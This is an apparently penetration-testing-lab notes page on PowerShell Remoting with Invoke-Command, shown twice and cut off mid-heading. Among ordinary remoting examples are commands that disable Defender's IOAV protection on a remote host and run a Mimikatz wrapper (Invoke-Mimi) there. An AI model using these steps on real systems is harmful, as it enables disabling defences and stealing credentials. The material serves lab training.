Author Discord HTB Pro Labs HTB CPTS HTB CDSA

PowerShell Remoting

You can run commands on one or hundreds of computers with a single PowerShell command. Windows PowerShell supports remote computing by using various technologies, including WMI, RPC, and WS-Management

PreviousWinRS NextInvoke-MimiKatz

Last updated 1 year ago

Was this helpful?

PowerShell Remoting

Verify if we can execute remote commands:

The Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. Using a single Invoke-Command command, you can run commands on multiple computers.

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

Run a script on a server:

Invoke-Command -FilePath c:\scripts\rfs.ps1 -ComputerName Server01

Run a single command on several computers

$parameters = @{
  ComputerName      = 'Server01', 'Server02', 'TST-0143', 'localhost'
  ConfigurationName = 'MySession.PowerShell'
  ScriptBlock       = { Get-WinEvent -LogName PowerShellCore/Operational }
}
Invoke-Command @parameters

Explanation of PowerShell Commands

Executing Remote Commands with Invoke-Command

The Invoke-Command cmdlet in PowerShell is a versatile command used to execute scripts and commands on both local and remote systems. Here is how it works:

To run commands on a single remote computer, you use Invoke-Command with the -ComputerName parameter:
```
Invoke-Command -ScriptBlock {whoami; hostname} -ComputerName dcorp-mgmt
```
This will execute the whoami and hostname commands on the remote computer named dcorp-mgmt.
For establishing a persistent connection to a remote computer, you can create a PowerShell session (PSSession):
```
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
```
The variable $sess stores the PSSession for the target computer dcorp-mgmt.dollarcorp.moneycorp.local.
You can then run commands in that session using Invoke-Command:
```
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```
This command modifies the antivirus preferences on the remote computer, utilizing the previously established session $sess.
To invoke custom functions or scripts that are defined locally on your computer on a remote session, you wrap the function name within ${function:FunctionName}:
```
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess
```
Here, Invoke-Mimi is presumably a custom or imported function that is being called remotely via $sess.

Running a Script on a Remote Server

To execute a local script on a remote machine using Invoke-Command, the -FilePath parameter can be used along with the -ComputerName:
```
Invoke-Command -FilePath c:\scripts\rfs.ps1 -ComputerName Server01
```
This runs the script rfs.ps1 that is located at c:\scripts on Server01.

Running Commands on Multiple

PreviousWinRS NextInvoke-MimiKatz

Last updated 1 year ago

Was this helpful?

Verify if we can execute remote commands:

The Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. Using a single Invoke-Command command, you can run commands on multiple computers.

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess

Run a script on a server:

Invoke-Command -FilePath c:\scripts\rfs.ps1 -ComputerName Server01

Run a single command on several computers

$parameters = @{
  ComputerName      = 'Server01', 'Server02', 'TST-0143', 'localhost'
  ConfigurationName = 'MySession.PowerShell'
  ScriptBlock       = { Get-WinEvent -LogName PowerShellCore/Operational }
}
Invoke-Command @parameters

Explanation of PowerShell Commands

Executing Remote Commands with Invoke-Command

The Invoke-Command cmdlet in PowerShell is a versatile command used to execute scripts and commands on both local and remote systems. Here is how it works:

To run commands on a single remote computer, you use Invoke-Command with the -ComputerName parameter:
```
Invoke-Command -ScriptBlock {whoami; hostname} -ComputerName dcorp-mgmt
```
This will execute the whoami and hostname commands on the remote computer named dcorp-mgmt.
For establishing a persistent connection to a remote computer, you can create a PowerShell session (PSSession):
```
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
```
The variable $sess stores the PSSession for the target computer dcorp-mgmt.dollarcorp.moneycorp.local.
You can then run commands in that session using Invoke-Command:
```
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```
This command modifies the antivirus preferences on the remote computer, utilizing the previously established session $sess.
To invoke custom functions or scripts that are defined locally on your computer on a remote session, you wrap the function name within ${function:FunctionName}:
```
Invoke-command -ScriptBlock ${function:Invoke-Mimi} -Session $sess
```
Here, Invoke-Mimi is presumably a custom or imported function that is being called remotely via $sess.

Running a Script on a Remote Server

To execute a local script on a remote machine using Invoke-Command, the -FilePath parameter can be used along with the -ComputerName:
```
Invoke-Command -FilePath c:\scripts\rfs.ps1 -ComputerName Server01
```
This runs the script rfs.ps1 that is located at c:\scripts on Server01.

Running Commands on Multiple